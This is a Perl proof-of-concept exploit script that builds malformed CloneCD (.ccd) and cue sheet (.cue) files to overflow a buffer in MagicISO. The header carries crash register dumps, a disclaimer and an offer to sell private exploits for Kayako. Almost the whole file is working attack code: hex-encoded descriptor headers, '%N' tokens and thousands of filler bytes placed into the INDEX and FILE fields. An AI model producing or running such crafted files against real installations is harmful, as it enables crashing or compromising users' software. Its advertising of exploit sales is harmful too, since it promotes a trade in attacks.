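#!/usr/bin/perl
#
# MagicISO CCD/Cue Local Heap Overflow Exploit Poc
# ----------------------------------------------------------------
# Mountassif Moad
# Stack ..
# Cyber-Zone ..
#
# Private exploits for Kayako, contact me if anyone want buy it :d
#
# WARNING: Author has no responsibility over the damage done
# Probably impossible to exploit, but who knows? -_-'
# Register for ccd
# EAX 44444141
# ECX 45459090
# EDX 90904443
# EBX 4545A094
# ESP 0012F3A0
# EBP 0012F3C4
# ESI 013AE64C
# EDI 013AF650
# EIP 005C04CE MagicISO.005C04CE
# Register for cue
# EAX 0012F5D4
# ECX 013B0000
# EDX 013ADDFC ASCII "FILE "999Ax%N%N%N%N%N%N%N08495d565ef66e7dff9f98764daAAAAAAAAAAAAAA...."
# EBX 00001241 EBc overwrited 41
# ESP 0012F4D8
# EBP 0012F4E4
# ESI 00001200
# EDI 00000000
# EIP 0047FE91 MagicISO.0047FE91
# Crash

use strict;
use warnings;

# Print the usage line and exit. The two accepted arguments are the file
# extensions checked below ('.ccd' and '.cue'); the original text said
# '.cpp', which the script never accepts.
sub help {
    print "[!] usage : \n perl $0 .ccd \n perl $0 .cue \n ";
    exit();
}

# Write $bytes to $path as a raw byte stream.
#   - three-arg open with a lexical handle: the mode cannot be injected via
#     the path and the handle is scoped to this sub;
#   - binmode: the descriptors below are binary and already carry explicit
#     CRLF pairs (\x0D\x0A), so no newline translation must be applied;
#   - open, print and close are all checked, so a failed or truncated write
#     dies instead of reporting "Done" over a partial file.
sub write_payload {
    my ($path, $bytes) = @_;
    open my $fh, '>', $path or die "[!] open $path: $!\n";
    binmode $fh;
    print {$fh} $bytes or die "[!] write $path: $!\n";
    close $fh or die "[!] close $path: $!\n";
    return;
}

help() unless $ARGV[0];
my $xpl = $ARGV[0];

# CloneCD (.ccd) descriptor as hex-escaped ASCII. It decodes to
# "[CloneCD]\r\nVersion=3\r\n[Disc]\r\nTocEntries=4\r\n..." through
# "[TRACK 1]\r\nMODE=1\r\nINDEX 1=999", i.e. the trailing "INDEX 1=" value
# is left open so the oversized token below becomes part of it.
my $header = "\x5B\x43\x6C\x6F\x6E\x65\x43\x44\x5D\x0D\x0A\x56\x65\x72\x73\x69".
    "\x6F\x6E\x3D\x33\x0D\x0A\x5B\x44\x69\x73\x63\x5D\x0D\x0A\x54\x6F".
    "\x63\x45\x6E\x74\x72\x69\x65\x73\x3D\x34\x0D\x0A\x53\x65\x73\x73".
    "\x69\x6F\x6E\x73\x3D\x31\x0D\x0A\x44\x61\x74\x61\x54\x72\x61\x63".
    "\x6B\x73\x53\x63\x72\x61\x6D\x62\x6C\x65\x64\x3D\x30\x0D\x0A\x43".
    "\x44\x54\x65\x78\x74\x4C\x65\x6E\x67\x74\x68\x3D\x30\x0D\x0A\x5B".
    "\x53\x65\x73\x73\x69\x6F\x6E\x20\x31\x5D\x0D\x0A\x50\x72\x65\x47".
    "\x61\x70\x4D\x6F\x64\x65\x3D\x31\x0D\x0A\x50\x72\x65\x47\x61\x70".
    "\x53\x75\x62\x43\x3D\x30\x0D\x0A\x5B\x45\x6E\x74\x72\x79\x20\x30".
    "\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31\x0D\x0A\x50\x6F".
    "\x69\x6E\x74\x3D\x30\x78\x61\x30\x0D\x0A\x41\x44\x52\x3D\x30\x78".
    "\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D\x30\x78\x30\x34".
    "\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D\x0A\x41\x4D\x69".
    "\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D\x0A\x41\x46\x72".
    "\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D\x2D\x31\x35\x30".
    "\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D\x69\x6E\x3D\x31".
    "\x0D\x0A\x50\x53\x65\x63\x3D\x30\x0D\x0A\x50\x46\x72\x61\x6D\x65".
    "\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D\x34\x33\x35\x30\x0D\x0A\x5B".
    "\x45\x6E\x74\x72\x79\x20\x31\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F".
    "\x6E\x3D\x31\x0D\x0A\x50\x6F\x69\x6E\x74\x3D\x30\x78\x61\x31\x0D".
    "\x0A\x41\x44\x52\x3D\x30\x78\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72".
    "\x6F\x6C\x3D\x30\x78\x30\x34\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F".
    "\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63".
    "\x3D\x30\x0D\x0A\x41\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C".
    "\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D".
    "\x0A\x50\x4D\x69\x6E\x3D\x31\x0D\x0A\x50\x53\x65\x63\x3D\x30\x0D".
    "\x0A\x50\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D".
    "\x34\x33\x35\x30\x0D\x0A\x5B\x45\x6E\x74\x72\x79\x20\x32\x5D\x0D".
    "\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31\x0D\x0A\x50\x6F\x69\x6E".
    "\x74\x3D\x30\x78\x61\x32\x0D\x0A\x41\x44\x52\x3D\x30\x78\x30\x31".
    "\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D\x30\x78\x30\x34\x0D\x0A".
    "\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D".
    "\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D\x0A\x41\x46\x72\x61\x6D".
    "\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A".
    "\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D\x69\x6E\x3D\x30\x0D\x0A".
    "\x50\x53\x65\x63\x3D\x32\x0D\x0A\x50\x46\x72\x61\x6D\x65\x3D\x33".
    "\x34\x0D\x0A\x50\x4C\x42\x41\x3D\x33\x34\x0D\x0A\x5B\x45\x6E\x74".
    "\x72\x79\x20\x33\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31".
    "\x0D\x0A\x50\x6F\x69\x6E\x74\x3D\x30\x78\x30\x31\x0D\x0A\x41\x44".
    "\x52\x3D\x30\x78\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D".
    "\x30\x78\x30\x34\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D".
    "\x0A\x41\x4D\x69\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D".
    "\x0A\x41\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D".
    "\x2D\x31\x35\x30\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D".
    "\x69\x6E\x3D\x30\x0D\x0A\x50\x53\x65\x63\x3D\x32\x0D\x0A\x50\x46".
    "\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D\x30\x0D\x0A".
    "\x5B\x54\x52\x41\x43\x4B\x20\x31\x5D\x0D\x0A\x4D\x4F\x44\x45\x3D".
    "\x31\x0D\x0A\x49\x4E\x44\x45\x58\x20\x31\x3D\x39\x39\x39";

# Cue sheet (.cue) pieces. $header1 decodes to 'FILE "' and $header2 to
# '.BIN" BINARY\r\n TRACK 01 MODE1/2352\r\n   INDEX 01 00:00:00'; the
# oversized token is placed between them, inside the quoted FILE name.
my $header1 = "\x46\x49\x4c\x45\x20\x22";
my $header2 = "\x2e\x42\x49\x4e\x22\x20\x42\x49\x4e\x41\x52\x59\x0d\x0a\x20".
    "\x54\x52\x41\x43\x4b\x20\x30\x31\x20\x4d\x4f\x44\x45\x31\x2f\x32".
    "\x33\x35\x32\x0d\x0a\x20\x20\x20\x49\x4e\x44\x45\x58\x20\x30\x31".
    "\x20\x30\x30\x3a\x30\x30\x3a\x30\x30";

# Prefix placed in front of the filler: decodes to "999Ax" followed by a run
# of "%N" tokens and a string of hex digits (see the EDX line in the author's
# cue register dump above).
my $bypass = "\x39\x39\x39\x41\x78\x25\x4e\x25\x4e\x25\x4e\x25\x4e\x25\x4e\x25".
    "\x4e\x25\x4e\x25\x4e\x25\x4e\x25\x4e\x25\x4e\x25\x25\x4e\x25\x4e".
    "\x25\x4e\x25\x4e\x41\x63\x66\x63\x64\x32\x30\x38\x34\x39\x35\x64".
    "\x35\x36\x35\x65\x66\x36\x36\x65\x37\x64\x66\x66\x39\x66\x39\x38".
    "\x37\x36\x34\x64\x61\x63\x34\x63\x61\x34\x32\x33\x38\x61\x30";

# Marker and filler segments; the variable names are the author's and refer
# to the register dumps in the header, the values are just distinct bytes.
my $edx = "\x43\x43\x43\x43";   # "CCCC"
my $Bof = "\x41" x 4004;        # 4004 bytes of "A"
my $eax = "\x44\x44\x44\x44";   # "DDDD"
my $Nop = "\x90" x 4;           # 4 bytes of 0x90
my $ecx = "\x45\x45\x45\x45";   # "EEEE"
my $Sop = "\x91" x 20;          # 20 bytes of 0x91
my $Hof = "\x46" x 5000;        # 5000 bytes of "F"

# Both descriptors share the same oversized body; only the framing differs.
my $body = $bypass . $edx . $Bof . $eax . $Nop . $ecx . $Sop . $Hof;

if ($xpl eq '.ccd') {
    write_payload('Exploit.ccd', $header . $body);
    print "[!] Done \n";
}
elsif ($xpl eq '.cue') {
    write_payload('Exploit.cue', $header1 . $body . $header2);
    print "[!] Done \n";
}
else {
    help();
}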